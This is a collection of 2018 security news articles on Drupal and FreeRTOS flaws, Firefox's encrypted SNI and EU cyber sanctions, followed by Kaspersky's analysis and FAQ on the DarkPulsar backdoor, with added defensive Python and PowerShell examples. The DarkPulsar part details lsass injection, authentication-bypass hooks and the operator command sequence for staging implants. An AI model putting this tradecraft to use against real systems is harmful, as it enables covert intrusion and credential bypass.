Another “critical” flaw is an injection issue in the DefaultMailSystem::mail() function. The problem is caused by the lack of sanitization of some variables for shell arguments when sending emails.

It’s worth noting that in Drupal’s case “critical” is the second highest security risk level, after “highly critical.” “Moderately critical” follows “critical” on the criticality scale.

The other three vulnerabilities addressed in the CMS this week have been assigned a “moderately critical” rating. This includes an access bypass issue related to content moderation, and two open redirect bugs.

One of the open redirect issues was publicly documented before the patches were released. Drupal developers also warned that the changes implemented in order to fix the access bypass weakness can have implications for backwards compatibility.

The vulnerabilities have been patched with the release of Drupal 7.60, 8.6.2 and 8.5.8.

It’s important that users install security updates as soon as possible. Drupal vulnerabilities have often been exploited by malicious hackers in the past years.

The recently disclosed flaws dubbed Drupalgeddon2 and Drupalgeddon3 have been exploited to deliver cryptocurrency miners, RATs, tech support scams and other threats. In recent attacks, threat actors exploited Drupalgeddon2 to install a backdoor on compromised servers.

Mozilla Brings Encrypted SNI to Firefox Nightly
21.10.2018 securityweek

Mozilla says Firefox Nightly now supports encrypting the Transport Layer Security (TLS) Server Name Indication (SNI) extension, several weeks after Cloudflare announced it turned on Encrypted SNI (ESNI) across all of its network.

Introduced in 2003 to address the issue of accessing encrypted websites hosted at the same IP, the SNI extension was found to leak the identity of the sites that the user visits, which creates privacy issues. The problem is that, during the initial TLS handshake, the ClientHello message is sent unencrypted.

ESNI, an extension to TLS version 1.3 and above, attempts to mitigate that by replacing the SNI extension in ClientHello with an encrypted variant.

Now, Firefox Nightly users can take advantage of this added protection by enabling the encryption of SNI in the browser. ESNI will automatically work with any site that supports it, which currently only means sites hosted by Cloudflare.

Over 80% of the web traffic today is encrypted with HTTPS, meaning that the content of the messages exchanged between a server and a user’s browser are kept private, but attackers can still learn which sites the user is accessing.

As Mozilla’s Eric Rescorla explains, browsing history information leaks to the network in four ways, namely through the TLS certificate message, DNS name resolution, the server IP address, and the SNI extension.

TLS 1.3 now encrypts the server certificate by default and DNS traffic can be protected by using DNS over HTTPS. The IP address remains an issue, somewhat mitigated by the fact that multiple sites often use the same address (which is the reason SNI was needed in the first place).
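To make the leak concrete, this added example (not Mozilla's or Cloudflare's code) constructs a minimal TLS ClientHello and parses it the way a passive network observer would; the ESNI payload is opaque placeholder bytes under the draft extension code point 0xffce, not real ciphertext.

```python
import struct

# Added example: a hand-built ClientHello record and the parse an on-path observer
# can do on it, since the whole message travels in cleartext. Not Firefox or
# Cloudflare code; the ESNI body below is a placeholder, not a real encrypted name.

TLS_HANDSHAKE = 22
CLIENT_HELLO = 1
EXT_SERVER_NAME = 0x0000        # server_name (RFC 6066)
EXT_ENCRYPTED_SNI = 0xFFCE      # encrypted_server_name, draft-ietf-tls-esni code point


def sni_extension(hostname: str) -> bytes:
    """server_name extension body: a ServerNameList holding one host_name entry."""
    name = hostname.encode("ascii")
    entry = b"\x00" + struct.pack("!H", len(name)) + name      # name_type 0 = host_name
    return struct.pack("!H", len(entry)) + entry


def build_client_hello(extensions: list) -> bytes:
    """Constructed ClientHello inside a TLS record (zeroed random, one cipher suite)."""
    body = b"\x03\x03" + bytes(32)                # legacy_version + random (zeroed here)
    body += b"\x00"                               # legacy_session_id: empty
    body += b"\x00\x02\x13\x01"                   # cipher_suites: TLS_AES_128_GCM_SHA256
    body += b"\x01\x00"                           # legacy_compression_methods: null
    ext = b"".join(struct.pack("!HH", t, len(d)) + d for t, d in extensions)
    body += struct.pack("!H", len(ext)) + ext
    handshake = bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([TLS_HANDSHAKE]) + b"\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def observe_client_hello(record: bytes) -> dict:
    """What an on-path observer learns from the cleartext ClientHello."""
    if record[0] != TLS_HANDSHAKE:
        raise ValueError("not a handshake record")
    (rec_len,) = struct.unpack("!H", record[3:5])
    hs = record[5:5 + rec_len]
    if hs[0] != CLIENT_HELLO:
        raise ValueError("not a ClientHello")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    pos = 2 + 32                                  # skip legacy_version and random
    pos += 1 + body[pos]                          # legacy_session_id
    (cs_len,) = struct.unpack("!H", body[pos:pos + 2])
    pos += 2 + cs_len                             # cipher_suites
    pos += 1 + body[pos]                          # compression methods
    (ext_total,) = struct.unpack("!H", body[pos:pos + 2])
    pos += 2
    end = pos + ext_total
    seen = {"sni": None, "esni_present": False, "extension_types": []}
    while pos < end:
        ext_type, ext_len = struct.unpack("!HH", body[pos:pos + 4])
        pos += 4
        data = body[pos:pos + ext_len]
        pos += ext_len
        seen["extension_types"].append(ext_type)
        if ext_type == EXT_SERVER_NAME:
            (list_len,) = struct.unpack("!H", data[:2])
            q = 2
            while q < 2 + list_len:               # each entry: type(1) length(2) name
                name_type = data[q]
                (name_len,) = struct.unpack("!H", data[q + 1:q + 3])
                if name_type == 0:
                    seen["sni"] = data[q + 3:q + 3 + name_len].decode("ascii")
                q += 3 + name_len
        elif ext_type == EXT_ENCRYPTED_SNI:
            seen["esni_present"] = True           # ciphertext: the name itself stays hidden
    return seen


# Constructed records: a classic hello, and one where the SNI extension has been
# replaced by an ESNI extension (placeholder bytes standing in for the ciphertext).
PLAIN_HELLO = build_client_hello([(EXT_SERVER_NAME, sni_extension("example.com"))])
ESNI_HELLO = build_client_hello([(EXT_ENCRYPTED_SNI, bytes.fromhex("1301" + "00" * 40))])

if __name__ == "__main__":
    print(observe_client_hello(PLAIN_HELLO))   # sni visible
    print(observe_client_hello(ESNI_HELLO))    # only the presence of ESNI is visible
```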

ESNI, Rescorla says, posed challenges because initial designs affected performance, and TLS 1.3 was eventually published without it. As it turns out, the issue can be addressed via mass conversion to encrypted SNI.

“Big Content Distribution Networks (CDNs) host a lot of sites all on the same machines. If they’re willing to convert all their customers to ESNI at once, then suddenly ESNI no longer reveals a useful signal because the attacker can see what CDN you are going to anyway,” he explains.

With the added support for ESNI, Firefox becomes the first browser to adopt the technology. Users looking to take advantage of it should grab the latest Firefox Nightly build, make sure they have DNS over HTTPS enabled, and set the “network.security.esni.enabled” preference in about:config to “true”.

“This should automatically enable ESNI for any site that supports it. Right now, that’s just Cloudflare, which has enabled ESNI for all its customers, but we’re hoping that other providers will follow them,” Rescorla notes.

EU Leaders Vow Tough Action on Cyber Attacks
21.10.2018 securityweek 

EU leaders on Thursday condemned the attempted hack on the global chemical weapons watchdog and vowed to step up the bloc's efforts to tackle cyber attacks.

With concerns growing about the malign cyber activities of several countries around the world, notably Russia, the bloc's leaders called for work to begin to set up sanctions to punish hackers.

The decision at an EU summit in Brussels comes after eight countries led by Britain pushed for urgent moves to hit hackers, warning that a lack of action was giving the impression that cyber attacks would go unpunished.

"Work on the capacity to respond to and deter cyber attacks through EU restrictive measures should be taken forward," the 28 leaders said in their summit communique.

The statement condemned the bid, revealed this month, by Russia's GRU military intelligence agency to hack the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague.

"Such threats and attacks strengthen our common resolve to further enhance the EU's internal security and our ability and capabilities to detect, prevent, disrupt and respond to hostile activities of foreign intelligence networks," the summit statement said.

A proposal backed by Britain, Lithuania, Estonia, Latvia, Denmark, Finland, Romania and the Netherlands earlier this week called for a sanctions regime to be set up to punish cyber attackers.

If approved, the EU sanctions regime would freeze assets held in the bloc by targeted individuals and ban them from travelling to the 28 member states.

But efforts to crack down on cyber attackers may face resistance from some EU members who want to improve relations with Russia, such as the new Italian government.

FreeRTOS Vulnerabilities Expose Many Systems to Attacks
21.10.2018 securityweek

Vulnerabilities discovered in the FreeRTOS operating system can expose a wide range of systems to attacks, including smart home devices and critical infrastructure, researchers warn.

FreeRTOS is an open source operating system designed specifically for microcontrollers. The OS has many use cases, including industrial applications (sensors, actuators, pumps), B2B solutions (security equipment, door locks), and consumer products (home appliances, wearable technology). Amazon, which took over the FreeRTOS project in 2017, has added cloud connectivity capabilities.

The commercial version of the operating system is called OpenRTOS and it’s maintained by WITTENSTEIN high integrity systems (WHIS), which also develops the safety-focused version SafeRTOS.

Researchers from Zimperium’s zLabs have analyzed FreeRTOS’s TCP/IP stack and AWS secure connectivity modules, and discovered more than a dozen vulnerabilities that also impact OpenRTOS and SafeRTOS.

Both Amazon and WHIS have developed patches for the flaws discovered by zLabs. Amazon addressed the issues with the release of FreeRTOS 1.3.2.

Since it’s an open source project, the mobile cybersecurity firm has decided not to disclose any vulnerability details for another 30 days to allow vendors to deploy the patches.

The company did, however, share some limited information about each of the flaws it discovered. The list includes four remote code execution, one denial-of-service (DoS), and seven information leakage issues.

“These vulnerabilities allow an attacker to crash the device, leak information from the device’s memory, and remotely execute code on it, thus completely compromising it,” zLabs said in a blog post.

Since FreeRTOS is used by a wide range of systems, the vulnerabilities found by Zimperium researchers can be highly useful to malicious actors, including cybercriminals trying to build botnets powered by home devices, and sophisticated threat actors looking to target critical infrastructure.

Server With National Guard Personnel Data Target of Attack
21.10.2018 securityweek 

The Indiana National Guard says a state, non-military computer server containing personal information on civilian and military Guard personnel was the target of a recent ransomware attack.

The Guard said Thursday it is notifying the affected personnel that they should be alert for suspicious activity or fraudulent accounts being opened in their name.

It says this type of ransomware attack targets the server by denying access to the rightful owners but usually does not compromise the contents of the server. It says it has no reason to believe it was a targeted attack against the Indiana National Guard.

The Guard says it's taking steps to prevent future such attacks.

20.10.2018 Kaspersky

In March 2017, the ShadowBrokers published a chunk of stolen data that included two frameworks: DanderSpritz and FuzzBunch.

DanderSpritz consists entirely of plugins to gather intelligence, use exploits and examine already controlled machines. It is written in Java and provides a graphical Windows interface similar to botnet administrative panels, as well as a Metasploit-like console interface. It also includes its own backdoors and plugins for victims not controlled via FuzzBunch.

DanderSpritz interface

FuzzBunch, on the other hand, provides a framework for different utilities to interact and work together. It contains various types of plugins designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. There are three files in the plugin set from the FuzzBunch framework:

This is the utility file of the framework. It duplicates the header from XML and includes the plugin’s ID.

This executable file is launched when FuzzBunch receives the command to do so.

This configuration file describes the plugin’s input and output parameters – the parameter name, its type and description of what it’s responsible for; all of these can be shown in FuzzBunch as a prompt. This file also contributes a lot to the framework’s usability, as it supports the specification of default parameters.

One of the most interesting FuzzBunch categories is called ImplantConfig and includes plugins designed to control infected machines via an implant at the post-exploitation stage. DarkPulsar belongs to this category: it is a very interesting administrative module for controlling a passive backdoor named ‘sipauth32.tsp’ that provides remote control.

It supports the following commands:

Burn, RawShellcode, UpgradeImplant, and PingPong remove the implant, run arbitrary code, upgrade the implant and check if the backdoor is installed on a remote machine, respectively. The purpose of the other commands is not that obvious and, to make it worse, the leaked framework contained only the administrative module to work with DarkPulsar’s backdoor, but not the backdoor itself.

While analyzing the administrative module, we noticed several constants that are used to encrypt the traffic between the C&C and the implant:

We thought that these constants would probably also appear in the backdoor, so we created a detection for them. Several months later we found our mysterious DarkPulsar backdoor. We were later able to find both 32- and 64-bit versions.

We found around 50 victims located in Russia, Iran and Egypt, typically infecting Windows 2003/2008 Server. Targets were related to nuclear energy, telecommunications, IT, aerospace and R&D.

DarkPulsar technical highlights
The DarkPulsar implant is a dynamic library whose payload is implemented in exported functions. These functions can be grouped as follows:

Two nameless functions used to install the backdoor in the system.
Functions with names related to TSPI (Telephony Service Provider Interface) operations that ensure the backdoor is in the autorun list and launched automatically.
A function with a name related to SSPI (Security Support Provider Interface) operations. It implements the main malicious payload.
The implementations of the SSPI and TSPI interfaces are minimalistic: the functions exported by DarkPulsar have the same names as the interface functions, but they contain malicious code instead of telephony functionality.

The implant is installed in the system by one of the nameless exported functions. The backdoor is launched by calling Secur32.AddSecurityPackage with administrator privileges, passing the path to its own library as the parameter; this causes lsass.exe to load DarkPulsar as an SSP/AP and to call its exported function SpLsaModeInitialize, which DarkPulsar uses to initialize the backdoor. In this way AddSecurityPackage is used to inject code into lsass.exe. The installer also adds its library name under HKLM\Software\Microsoft\Windows\CurrentVersion\Telephony\Providers.

This library is loaded at startup by the Telephony API service (TapiSrv), which is launched alongside the Remote Access Connection Manager (RasMan) service, with the startup type set to “Automatic”. When loading the telephony service provider’s library, TapiSrv calls TSPI_lineNegotiateTSPIVersion, which contains the AddSecurityPackage call that performs the injection into lsass.exe.

DarkPulsar implements its payload by installing hooks on SpAcceptLsaModeContext, the function responsible for authentication. These hooks are placed in several system authentication packages within the lsass.exe process and allow DarkPulsar to control the authentication process for the following protocols:

Msv1_0.dll – for the NTLM protocol,
Kerberos.dll – for the Kerberos protocol,
Schannel.dll – for the TLS/SSL protocols,
Wdigest.dll – for the Digest protocol, and
Lsasrv.dll – for the Negotiate protocol.
After this, DarkPulsar is able to embed its traffic into system protocols. Since this network activity follows the standard system paths, it is only reflected in the System process: it uses the system ports reserved for the above protocols without hindering their normal operation.

Network traffic during successful connection to DarkPulsar implant

The second advantage of controlling the authentication process is the ability to bypass entering a valid username and password to obtain access to objects that require authentication, such as the process list, the remote registry or the file system via SMB. After DarkPulsar’s DisableSecurity command is sent, the backdoor’s hooks on the victim side make SpAcceptLsaModeContext always report that the supplied credentials are valid, and the system then grants the client access to the protected objects.

Working with DarkPulsar
Darkpulsar-1.1.0.exe is the administrative interface, working on the principle of “one command – one launch”. The command to be executed must be specified either in the configuration file Darkpulsar- or as command line arguments, giving at least:

whether the target machine uses a 32-bit or 64-bit system;
the protocol (SMB, NBT, SSL and RDP are supported) used to deliver the command, and the port number;
the private RSA key used to decrypt the session AES key.
Darkpulsar-1.1.0 was not designed as a standalone program for managing infected machines; it is a plugin of the Fuzzbunch framework, which manages parameters and coordinates the different components. Here is what the DisableSecurity command looks like in Fuzzbunch:

Below is an example of the Processlist plugin run after DisableSecurity: any plugin can now be executed without valid credentials, operating via regular system functions (here the remote registry service):

DanderSpritz is the framework for controlling infected machines. It differs from FuZZbuNch in that the latter provides only a limited toolkit for the post-exploitation stage, with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar.

DanderSpritz, by contrast, works with a larger range of backdoors, using PeddleCheap on the victim side to let operators launch plugins. PeddleCheap is a DanderSpritz plugin that can be used to configure implants and connect to infected machines. Once a connection is established, all DanderSpritz post-exploitation features become available.

This is how DarkPulsar in EDFStagedUpload mode makes it possible to infect the victim with a more functional implant: PCDllLauncher (a Fuzzbunch plugin) deploys the PeddleCheap implant on the victim side, and DanderSpritz provides a user-friendly post-exploitation interface. Hence the full name of PCDllLauncher: ‘PeddleCheap DLL Launcher’.

The complete DanderSpritz usage scheme with the plugin PeddleCheap via FuZZbuNch with the plugins DarkPulsar and PCDllLauncher consists of four steps:

Via FuZZbuNch, run the command EDFStagedUpload to launch DarkPulsar.
In DanderSpritz, run the command pc_prep (PeddleCheap Preparation) to prepare the payload and the library to be launched on the implant side.
In DanderSpritz, run the command pc_old (an alias of pc_listen -reuse -nolisten -key Default); this sets it to wait for a socket from Pcdlllauncher.
Launch Pcdlllauncher via FuZZbuNch and specify, in the ImplantFilename parameter, the path to the payload prepared with pc_prep.


File System plugin

The FuzzBunch and DanderSpritz frameworks are designed to be flexible and to extend functionality and compatibility with other tools. Each of them consists of a set of plugins designed for different tasks: while FuzzBunch plugins are responsible for reconnaissance and attacking a victim, plugins in the DanderSpritz framework are developed for managing already infected victims.

The discovery of the DarkPulsar backdoor helped us understand its role as a bridge between the two leaked frameworks, and how they form part of the same attack platform designed for long-term compromise, built on DarkPulsar’s advanced persistence and stealth capabilities. The implementation of these capabilities, such as encapsulating its traffic in legitimate protocols and bypassing the need to enter credentials to pass authentication, is highly professional.

Our products completely remove the malware related to this attack.

Detecting malicious network activity
When EDFStagedUpload is executed on an infected machine, a permanent connection is established, which is why traffic via port 445 appears. A pair of bound sockets also appears in lsass.exe:

When DanderSpritz deploys PeddleCheap’s payload via the PcDllLauncher plugin, network activity increases dramatically:

When a connection to the infected machine is terminated, network activity ceases, and only traces of the two bound sockets in lsass.exe remain:

Implant – 96f10cfa6ba24c9ecd08aa6d37993fe4
File path – %SystemRoot%\System32\sipauth32.tsp
Registry – HKLM\Software\Microsoft\Windows\CurrentVersion\Telephony\Providers
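As an added hunting example that is not part of the Kaspersky report, the PowerShell below checks a single host for the three indicators just listed and for the lsass.exe sockets mentioned under “Detecting malicious network activity”. It assumes TAPI registers providers as ProviderFileName<N> values under the Providers key and that the built-in TSP list in the script represents a clean system; adjust that list for your build.

```powershell
# Added host check (not from the Kaspersky report). Run from an elevated prompt.
# Assumption: TAPI providers are registered as ProviderFileName<N> values, and
# the $KnownTsp list below is representative of a clean system (adjust per build).

$ImplantMd5  = '96f10cfa6ba24c9ecd08aa6d37993fe4'          # hash from the report
$ImplantPath = Join-Path $env:SystemRoot 'System32\sipauth32.tsp'
$ProvKey     = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Providers'
$KnownTsp    = @('unimdm.tsp', 'kmddsp.tsp', 'ndptsp.tsp', 'hidphone.tsp', 'remotesp.tsp')
$findings    = @()

# 1. Registered telephony service providers: flag anything not in the known list.
$prov = Get-ItemProperty -Path $ProvKey -ErrorAction SilentlyContinue
if ($prov) {
    foreach ($p in $prov.PSObject.Properties) {
        if ($p.Name -like 'ProviderFileName*') {
            $file = [System.IO.Path]::GetFileName("$($p.Value)").ToLower()
            if ($KnownTsp -notcontains $file) {
                $findings += "Unexpected TSP registered: $($p.Name) = $($p.Value)"
            }
        }
    }
}

# 2. Implant file on disk: compare its MD5 with the published hash.
#    .NET is used instead of Get-FileHash so this also runs on PowerShell 2.0
#    (Windows Server 2003/2008, the platforms the report names as typical targets).
if (Test-Path $ImplantPath) {
    $bytes = [System.IO.File]::ReadAllBytes($ImplantPath)
    $hash  = [System.Security.Cryptography.MD5]::Create().ComputeHash($bytes)
    $md5   = ([System.BitConverter]::ToString($hash) -replace '-', '').ToLower()
    if ($md5 -eq $ImplantMd5) { $findings += "DarkPulsar implant at $ImplantPath (MD5 match)" }
    else { $findings += "sipauth32.tsp present at $ImplantPath, unknown MD5 $md5" }
}

# 3. TCP sockets owned by lsass.exe. On a workstation or member server lsass
#    should own none; on a domain controller it legitimately listens on
#    LDAP/Kerberos ports, so treat this as something to review, not an alert.
$lsass = Get-Process -Name lsass -ErrorAction SilentlyContinue
if ($lsass) {
    foreach ($line in (netstat -ano -p tcp)) {
        $f = $line.Trim() -split '\s+'               # Proto Local Foreign State PID
        if ($f.Count -ge 5 -and $f[0] -eq 'TCP' -and $f[4] -eq "$($lsass.Id)") {
            $findings += "lsass.exe (PID $($lsass.Id)) owns $($f[1]) -> $($f[2]) [$($f[3])]"
        }
    }
}

if ($findings) { $findings | ForEach-Object { Write-Warning $_ } }
else { Write-Output 'No DarkPulsar indicators found on this host.' }
```

A hit on any of the three checks is a reason to image the host rather than just delete the file, since the report describes the implant as a bridge to further DanderSpritz tooling.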

DarkPulsar FAQ
20.10.2018 Kaspersky 
What’s it all about?
In March 2017, a group of hackers calling themselves “the Shadow Brokers” published a chunk of stolen data that included two frameworks: DanderSpritz and FuzzBunch. The Fuzzbunch framework contains various types of plugins designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. The DanderSpritz framework is designed to examine already controlled machines and gather intelligence. Together, they form a very powerful platform for cyber-espionage.

How was this implant discovered?
We always analyze all leaks containing malicious software to provide the best detection, and that was also the case after the “Lost in Translation” leak was revealed. We noticed that this leak contained a tool in the “implants” category called DarkPulsar. We analyzed this tool and understood that it is not a backdoor itself, but only the administrative part. We also noticed some magic constants in this administrative module and, having created special signatures based on them, were able to catch the implant itself.

What exactly can this implant be used for?
This implant supports 7 commands; the most interesting are DisableSecurity and EnableSecurity.

Burn – for self-deletion.
RawShellcode – to execute arbitrary base-independent code.
EDFStagedUpload – Exploit Development Framework Stage Upload. Step by step, it deploys DanderSpritz payloads into the victim’s memory without touching the drive. After this command is executed, the administrator can send any of the many DanderSpritz commands to the victim. (See the technical part of this report for details.)
DisableSecurity – for disabling NTLM protocol security. With this command, the malware administrator does not need to know a valid victim username and password to pass authentication: the system will interpret any arbitrary pair as valid. (See the technical part of this report for details.)
EnableSecurity – the opposite of DisableSecurity.
UpgradeImplant – for installing a new version of the backdoor.
PingPong – for testing communication.

How many victims?
We found around 50 victims, but believe the figure was much higher when the Fuzzbunch and DanderSpritz frameworks were actively used. We think so because the DanderSpritz interface allows many victims to be managed at the same time. A second point supporting this is that after stopping a cyber-espionage campaign, malware owners often delete their malware from victim computers, so the 50 victims are very probably just the ones the attackers simply forgot about.

Which countries?
All victims were located in Russia, Iran and Egypt, and typically Windows 2003/2008 Server was infected. Targets were related to nuclear energy, telecommunications, IT, aerospace and R&D.

What about the attack duration? Does it last long?
DarkPulsar’s creators did not skimp on resources in developing such an advanced mechanism of persistence. They also included functionality to disable NTLM protocol security for bypassing the need to enter a valid username and password during authentication. This indicates that victims infected with DarkPulsar were the targets of a long-term espionage attack.

Is the attack still active?
We think that after the “Lost In Translation” leak the espionage campaign was stopped, but that doesn’t mean that all computers are rid of this backdoor. We cured all our users. As for users without our protection, we have several tips on how to check whether your system is infected and how to cure it yourself. Note that to exploit this backdoor on infected victims, the attackers need to know the private